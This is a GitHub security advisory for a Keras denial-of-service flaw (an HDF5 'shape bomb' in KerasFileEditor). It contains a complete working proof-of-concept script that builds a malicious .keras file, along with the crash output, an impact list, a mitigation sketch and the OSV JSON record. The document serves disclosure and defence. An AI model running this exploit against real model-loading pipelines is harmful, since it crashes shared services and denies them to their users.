GHSA-MGX6-5CF9-RR43
Vulnerability from github – Published: 2026-05-06 23:09 – Updated: 2026-05-06 23:09

Summary
Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading,
Keras executes:

```python
result[key] = value[()]  # loads entire dataset into memory
```

`value[()]` instructs h5py to allocate RAM proportional to the dataset's declared shape – in this case 8.88 PiB of memory. This results in:

- Immediate memory exhaustion
- Python / TensorFlow crashes
- Jupyter kernel kills
- System instability
- Full denial of service on any workload that processes untrusted .keras models

This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, and automated pipelines.
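To see why the declared shape alone drives the allocation, here is a memory-safe variant of the same pattern. The 2000×2000 shape below is a hypothetical stand-in for the petabyte-scale payload: the dataset occupies ~16 MB once read, even though only a single element was ever written and the file itself stays tiny.

```python
import io
import h5py
import numpy as np

buf = io.BytesIO()
with h5py.File(buf, "w") as f:
    # Declare a 2000x2000 float32 dataset (~16 MB in RAM) but write one element.
    d = f.create_dataset("w", shape=(2000, 2000), dtype="float32",
                         compression="gzip", compression_opts=9)
    d[0, 0] = 1.0

print(f"file size: {len(buf.getvalue())} bytes")  # far smaller than 16 MB

buf.seek(0)
with h5py.File(buf, "r") as f:
    arr = f["w"][()]   # h5py allocates the full declared shape here
    print(arr.nbytes)  # 16_000_000 bytes, regardless of what was stored
```

Scaling the declared shape up while keeping the stored data minimal is exactly the asymmetry the shape bomb exploits.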
Proof of Concept
```python
# PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor

# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
    hdf5_bytes = io.BytesIO()

    # Create an HDF5 file with a huge declared dataset shape
    with h5py.File(hdf5_bytes, "w") as f:
        d = f.create_dataset(
            "payload",
            shape=(50_000_000, 50_000_000),  # Extremely large shape → petabytes on load
            dtype="float32",
            compression="gzip",
            compression_opts=9
        )
        # Write minimal data so the file stays very small
        d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)

    hdf5_bytes.seek(0)

    # Build a valid .keras archive structure
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("config.json", "{}")
        z.writestr("metadata.json", "{}")
        z.writestr("model.weights.h5", hdf5_bytes.getvalue())

# Generate the malicious model file
create_malicious_keras()

# Trigger the DoS vulnerability when Keras loads the malicious file
KerasFileEditor("bomb.keras")
```
Expected Result

```
numpy._core._exceptions._ArrayMemoryError:
Unable to allocate 8.88 PiB for an array with shape (50000000, 50000000)
```
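The figure in the error message can be verified with back-of-envelope arithmetic, assuming the 4 bytes per float32 element that the declared dtype implies:

```python
# Declared allocation for a (50_000_000, 50_000_000) float32 array
rows = cols = 50_000_000
bytes_needed = rows * cols * 4    # 1.0e16 bytes
pib = bytes_needed / 2**50        # 1 PiB = 2**50 bytes
print(f"{pib:.2f} PiB")           # -> 8.88 PiB, matching the traceback
```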
This crash occurs before any actual model processing, confirming the Denial-of-Service impact.
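The upstream fix is in the pull requests referenced in this advisory; purely as an illustration, a loader could reject suspicious weight files by comparing each dataset's declared in-memory size against a budget before reading anything. The `check_h5_datasets` helper and `MAX_BYTES` threshold below are hypothetical and not part of the Keras API:

```python
import io
import h5py
import numpy as np

MAX_BYTES = 1 << 30  # hypothetical 1 GiB per-dataset budget

def check_h5_datasets(h5file, max_bytes=MAX_BYTES):
    """Raise ValueError if any dataset declares more in-memory bytes than allowed."""
    def visit(name, obj):
        if isinstance(obj, h5py.Dataset):
            declared = int(np.prod(obj.shape, dtype=np.int64)) * obj.dtype.itemsize
            if declared > max_bytes:
                raise ValueError(
                    f"dataset {name!r} declares {declared} bytes (> {max_bytes})"
                )
    h5file.visititems(visit)

# Demo: one benign dataset and one with a bloated declared shape (nothing is read)
buf = io.BytesIO()
with h5py.File(buf, "w") as f:
    f.create_dataset("ok", shape=(10, 10), dtype="float32")
    f.create_dataset("bomb", shape=(1_000_000, 1_000_000), dtype="float32",
                     compression="gzip")
buf.seek(0)
with h5py.File(buf, "r") as f:
    try:
        check_h5_datasets(f)
    except ValueError as e:
        print("rejected:", e)
```

The key property is that the check only inspects HDF5 metadata (`shape`, `dtype`), so it never triggers the allocation it is guarding against.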
Impact
This vulnerability allows an attacker to crash any system that loads a malicious .keras model file.
The attacker can:
- Cause immediate memory exhaustion (8+ PiB allocation attempts)
- Crash TensorFlow / Python interpreter
- Kill Jupyter kernels
- Break automated model-upload pipelines
- Crash MLOps servers that process user models
- Deny service to shared GPU/CPU environments
If a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a remote denial-of-service vector.

Additional PoC Evidence (Video Demonstration)

Attached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.

PoC Video (Google Drive): [PoC Video](https://drive.google.com/file/d/1XAj57epTBWpj93GwHprHvb14WS9wpl5m/view?usp=drivesdk)
Finding: Critical memory-exhaustion flaw triggered by crafted .keras model files
Vector: Malicious metadata causing extreme tensor shape inflation
Impact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process
Attack Scenario: Remote DoS on ML model processing pipelines and cloud inference services
Demonstration: The PoC video shows the crash occurring on Google Colab. Loading the malicious model consumed all system RAM and repeatedly terminated the runtime. The impact was severe enough that the Colab compute quota dropped from 83 hours to 4 hours after only a few tests. With larger payloads, this would instantly exhaust resources in real production pipelines.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.12.0"
},
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.12.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.13.0"
},
{
"fixed": "3.13.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-0897"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T23:09:37Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nKeras\u2019s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50_000_000, 50_000_000)), but stores only a few bytes. The .keras file remains small (100\u2013400 KB) because HDF5 with gzip compression stores minimal data. During model loading, \nKeras executes:\n`python\nresult[key] = value[()] # loads entire dataset into memory`\nvalue[()] instructs h5py to allocate RAM proportional to the dataset\u2019s declared shape \u2013 in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.\n### Proof of Concept\n```\n// PoC.py\nimport zipfile\nimport io\nimport h5py\nimport numpy as np\nfrom keras.saving import KerasFileEditor\n\n# Create a malicious .keras model containing a massive HDF5 shape bomb\ndef create_malicious_keras(path=\"bomb.keras\"):\n hdf5_bytes = io.BytesIO()\n\n # Create an HDF5 file with a huge declared dataset shape\n with h5py.File(hdf5_bytes, \"w\") as f:\n d = f.create_dataset(\n \"payload\",\n shape=(50_000_000, 50_000_000), # Extremely large shape \u2192 petabytes on load\n dtype=\"float32\",\n compression=\"gzip\",\n compression_opts=9\n )\n # Write minimal data so the file stays very small\n d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)\n\n hdf5_bytes.seek(0)\n\n # Build a valid .keras archive structure\n with zipfile.ZipFile(path, \"w\", zipfile.ZIP_DEFLATED) as z:\n z.writestr(\"config.json\", \"{}\")\n 
z.writestr(\"metadata.json\", \"{}\")\n z.writestr(\"model.weights.h5\", hdf5_bytes.getvalue())\n\n# Generate the malicious model file\ncreate_malicious_keras()\n\n# Trigger the DoS vulnerability when Keras loads the malicious file\nKerasFileEditor(\"bomb.keras\")\n```\n### Expected Result\n```\nnumpy._core._exceptions._ArrayMemoryError:\nUnable to allocate 8.88 PiB for an array with shape (50000000, 50000000)\n```\nThis crash occurs before any actual model processing, confirming the Denial-of-Service impact.\n### Impact\nThis vulnerability allows an attacker to crash any system that loads a malicious `.keras` model file.\n\nThe attacker can:\n\n- Cause immediate memory exhaustion (8+ PiB allocation attempts)\n- Crash TensorFlow / Python interpreter\n- Kill Jupyter kernels\n- Break automated model-upload pipelines\n- Crash MLOps servers that process user models\n- Deny service to shared GPU/CPU environments\n\nIf a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a Remote Denial of Service vector.\nAdditional PoC Evidence (Video Demonstration)\nAttached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.\n\nPoC Video (Google Drive):\n[PoC Video](https://drive.google.com/file/d/1XAj57epTBWpj93GwHprHvb14WS9wpl5m/view?usp=drivesdk)\n\nFinding: Critical memory-exhaustion flaw triggered by crafted .keras model files\nVector: Malicious metadata causing extreme tensor shape inflation\nImpact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process\nAttack Scenario: Remote DoS on ML model processing pipelines and cloud inference services\n\nDemonstration:\nThe PoC video shows the crash occurring on Google Colab.\nLoading the malicious model consumed all system RAM and repeatedly terminated the runtime.\nSeverity is high enough that the compute quota dropped from 83 hours \u2192 4 hours 
after only a few tests.\nWith larger payloads, this would instantly exhaust resources in real production pipelines.",
"id": "GHSA-mgx6-5cf9-rr43",
"modified": "2026-05-06T23:09:38Z",
"published": "2026-05-06T23:09:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-mgx6-5cf9-rr43"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0897"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/21880"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/22081"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb"
},
{
"type": "PACKAGE",
"url": "https://github.com/keras-team/keras"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petabyte Allocation in KerasFileEditor)"
}